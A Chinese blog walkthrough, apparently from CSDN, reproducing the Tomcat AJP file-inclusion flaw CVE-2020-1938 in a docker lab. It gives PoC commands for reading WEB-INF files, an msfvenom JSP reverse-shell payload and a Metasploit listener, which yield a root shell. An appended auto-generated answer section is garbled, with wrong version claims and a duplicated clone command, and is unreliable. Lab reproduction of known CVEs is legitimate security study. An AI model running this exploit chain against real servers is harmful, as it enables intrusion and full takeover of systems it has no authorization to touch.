CVE-2020-1938 漏洞复现

0x00 漏洞描述

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。

0x01 影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

0x02 环境搭建

1.进入docker目录下的tomcat/CVE-2020-1938

2.启动 sudo docker-compose up -d

3.查看端口 sudo docker ps -a

4.进入环境目录 sudo docker exec -it ec1b03d2b457(id)  bash

0x03 漏洞利用

一、文件读取

1.下载POC检测是否存在漏洞

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

2.尝试读取8009端口下的web.xml文件

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.47.129 -p 8009 -f /WEB-INF/web.xml

 

3.在tomcat/webapps/ROOT/WEB-INF目录下创建一个test.txt文件,内容是helloworld,尝试访问试试 

echo helloworld > ./webapps/ROOT/WEB-INF/test.txt

读取test.txt

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 192.168.47.129 -f /WEB-INF/test.txt

 读取成功

二、文件包含getshell

尝试了一下不懂为什么文件包含不起作用,换一个POC就可以了

git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/

1.首先使用msf生成一个java木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.47.129 LPORT=6666 > shell.txt

2.将生成的木马复制到tomcat目录下,模拟我们已经将shell.txt上传

docker cp /home/kali/桌面/shell.txt ec1b03d2b457:/usr/local/tomcat/webapps/ROOT/WEB-INF/shell.txt

3.打开msf进行监听

use exploit/multi/handler

set payload java/jsp_shell_reverse_tcp

set lport 6666
set lhost 192.168.47.129

run

 4.访问shell.txt,使shell.txt发生文件包含

python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/shell.txt 192.168.47.129

 最后成功反弹,权限是root

  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值